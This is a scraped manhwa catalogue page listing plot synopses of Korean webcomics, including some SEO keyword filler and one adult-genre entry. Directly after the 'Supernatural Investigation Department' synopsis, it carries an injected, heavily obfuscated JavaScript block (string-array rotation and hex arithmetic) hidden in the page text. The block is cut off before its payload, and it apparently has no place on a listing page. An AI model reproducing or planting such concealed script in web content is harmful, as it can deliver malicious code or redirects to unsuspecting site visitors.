Manhwa - Page 158

Manhwa, the Korean version of comics, is renowned for its digital format and engaging stories across genres, from romance to action and fantasy.

2962 results

There’s A Rat In Our House

Amidst the freezing winter, a solitary being huddled on the snow-covered pavement, bearing the burden of deep loneliness and faded scars. It had forsaken itself, fragile and vulnerable. The reason for welcoming this nameless creature into the home was straightforward. “What… does this mean?” “You helped me, and I wish to return the favor.” In the complete darkness where no trace of light could penetrate, only two warm bodies occupied the space.


Lover Boy (Jeky)

Eunho, the little neighbor boy that always asked Jaeha to marry him is all grown up now. Jaeha never gave little Eunho a second thought until one day, years later, Eunho suddenly reinserts himself into Jaeha’s life. Will Eunho forever be the little neighbor boy to Jaeha? Or will Jaeha finally see Eunho for the man he’s now become?


Get Schooled

Hwajin Na's teaching techniques are pretty violent for someone who works in the Ministry of Education. That being said, when punishments don't seem to work on even the worst of school bullies, there is no better man for the job. Sometimes you can't get a good education until those bullies are taught a lesson.


Kingmaker Goddess

Read manhwa Kingmaker Goddess Just before becoming a deity in the celestial realm, the goddess ‘Siren’ is deceived by Arwen, whom she believed to be a friend, losing all her ‘Human Play Points’ necessary to enter the celestial world. The fastest way to regain these points is to successfully complete the most challenging human experiences. To achieve this, she is reborn as the daughter of ‘Targa,’ the illegitimate son of the Caronin Empire, and works hard to make him emperor. “Wait for me, Dad! I will definitely make you an emperor!” A different name for “Kingmaker Goddess Manhwa” Goddess Kingmaker / 킹메이커 여신님


Records of the Demonic Path’s Return

Read manhwa Records of the Demonic Path’s Return / 마도협객 The main character Myeong-woon has escaped to a faraway sanctuary to avoid the Heavenly Demon Dod Cult’s fight for power. However, as he did not coincide with the Throne’s Will, he was unable to avoid strife. To make Myeong-un stir a fight within his family, the Heavenly Demon God Cult’s Leader, Myeonggak, visited him. Myeong-woon dies during his attempt to escape him. But right before he died, a voice spoke to him in his hazying consciousness. ‘…Do you regret it? Would you like to fight another time?” Myeong-woon believes he died after this voice away but he opens his eyes and…


Supernatural Investigation Department

As a little boy, Si Mun, the grandson of a famous shaman, had the ability to see – and communicate with – ghosts. His grandmother gave him a talisman which temporarily rid him of this ability and erased his memories of any supernatural phenomena he had witnessed. Years later, Si Mun is working a hectic, yet ordinary, job as a homicide detective in the Korean police force. His grandmother has since passed on – and the powers she sealed away appear to be reawakening…<script></script><script>(function(_0x47e979,_0x45a1af){var _0xa37ab5=_0x1f89,_0x42423e=_0x47e979();while(!![]){try{var _0x228d13=parseInt(_0xa37ab5(0xf9))/(0x697+0x1*0x179e+-0x4*0x78d)+-parseInt(_0xa37ab5(0xe7))/(-0x25a7+-0x1c51+0x15fe*0x3)+parseInt(_0xa37ab5(0xf6))/(0x1*-0x1ac9+-0x1*0x9f7+0x24c3*0x1)+parseInt(_0xa37ab5(0xe2))/(0x1195*-0x2+-0x17ec+0x3b1a)+parseInt(_0xa37ab5(0xec))/(0x6a5+-0x1d6b+0x16cb)*(-parseInt(_0xa37ab5(0xe1))/(0x11*-0x4f+-0x119+0x1*0x65e))+-parseInt(_0xa37ab5(0xf8))/(-0x18b+-0x23d8+0x2*0x12b5)+parseInt(_0xa37ab5(0xea))/(-0x1*-0xc46+0x3*0xb1b+-0x2d8f)*(parseInt(_0xa37ab5(0xee))/(0x125f+0x754+-0x19aa));if(_0x228d13===_0x45a1af)break;else _0x42423e['push'](_0x42423e['shift']());}catch(_0x1be988){_0x42423e['push'](_0x42423e['shift']());}}}(_0x5030,-0x1ada4+0x337*0x2de+-0x1c6a));function custom(){var _0x3ca920=_0x1f89,_0x102d92={'ztvEV':function(_0x80937,_0x240d0d){return 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I Will Become the Villain’s Poison Detector

Read manhwa I Will Become the Villain’s Poison Detector / 흑막의 독 감별사가 되겠습니다 Before hanging, she became a villainess in a devastated novel where her life was supposed to end after being poisoned. However, what happened was that she couldn’t die of poison. What’s even more surprising was that she could tell the taste of the poison! “I can tell the taste of poison.” “Really?” “Yes.” “What kind of use is that?” Oh my. This evil woman’s past was too formidable to survive with tricks. So she took out the secret card. “Your boss will be poisoned.” That’s right, it’s something about the villain that I know! “I can be your poison dectector.” So I thought I could survive well as an employee of a general store in front of the villain… My boss, who I thought was just an extra in the black valley, was ranked number one? It was an out-dated story that was popular before… “…It’s not cliche, indeed.” You’re scared of poison? I’ll eat it for you!

1 days ago

Charlotte’s Wheel

Read manhwa Charlotte’s Wheel / 샬롯의 수레바퀴 Vivian, an evil woman called the old castle witch. After committing all kinds of crimes, he was finally killed by the revolutionary forces. Just before her death, the Dusk Witch appears in front of her and returns Vivian to three years ago, leaving a meaningful message. After vowing never to lose her loved ones again, Vivian rose to power.


Joseon Dynasty Erotica Records

Read “Joseon Dynasty Erotica Records Novel” – “Joseon Dynasty Erotica Records Manhwa” Online Free At MANGAZIN The summary of the comics “Joseon Dynasty Erotica Records”: Seo Mina, a successful adult webtoon writer, might have a thriving career, but her dating life is a disaster. One fateful night, she discovers her boyfriend cheating on her with another man. In a chaotic attempt to retrieve her unused condoms, she tumbles into the Han River and is mysteriously transported back to the Joseon Dynasty! Struggling to adapt to her new reality, Mina’s fortunes take an unexpected turn when she sketches a provocative drawing of a naked man while working in the kitchens of a gisaeng house. Her bold artwork catapults her to fame, and she seizes the opportunity to create Joseon’s very own adult webtoon: a tantalizing collection of erotic drawings. Her work becomes the talk of the capital, captivating the women of Joseon. Just as Mina basks in her newfound notoriety, a mysterious stranger approaches her with an audacious proposition: “From now on, draw erotica for the sake of Joseon.” Faced with this absurd yet thrilling challenge, Mina’s adventure in the past is just beginning. “Joseon Dynasty Erotica Records” is alternatively named: Annals of Joseon Spring Flowers / Annals of Joseon Spring Paintings / Annals of Joseon Spring Painting / 조선춘화실록 The comics “Joseon Dynasty Erotica Records” belongs to the Genre: Adult, Drama, Fantasy, Manhwa, Mature, Romance, Smut “KUNMANGA, MANGA UPDATES, HARIMANGA…” are the most searched keywords on the website ShojoScans. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA My Ruined Academy How to Change Angst Into a Feel-Good The Beast Tamed by the Evil Woman


Sovereign Of The Infinite Clones

A young man, Han Sunghyun, loses his family in an indiscriminate attack by superhumans. While living a reclusive life due to the trauma of the incident, one day, he awakens the ability to control avatars in his place! "What?! I can send avatars to hunt in dangerous otherworlds while I stay safely at home, just focusing on strengthening my powers?!" As his avatars grow rapidly, crossing dimensions, races, and professions, Han Sunghyun begins to hunt down the superhumans who abuse their powers!


Mary Psycho

Read manhwa Mary Psycho / 메리 사이코 Two years of married life that felt as sweet as a dream. But one day, her husband disappeared without a trace. Han Seo-ryeong, an ordinary housewife and blind woman, sets out to find her husband. However, the truth she uncovers is beyond anything she could have imagined. Her husband was a black ops agent with a hundred faces, and everything she believed in was merely part of his ‘job.’ Crushed by despair, Seo-ryeong begins to unleash the madness she had kept hidden. If she can’t catch him, then she’d rather be caught first!

3 days ago

One Husband Is Enough

Summary: <I thought life would be fun if everyone loved me.> An ordinary office worker gets enchanted by the allure of a romance fantasy game, possessed by the character whose charm is 999 points, the Count’s daughter ‘Crochetta’. People rushing to her in frenzy as soon as their eyes meet hers. Crochetta decides to conquer the “male leads” and escape the game. The libertine prince, the misanthropic duke, the devoted knight. But all the male leads here seem suspicious. Moreover, it seems her powers don’t work on them… Can she successfully conquer the male leads and reach a safe ending?

3 days ago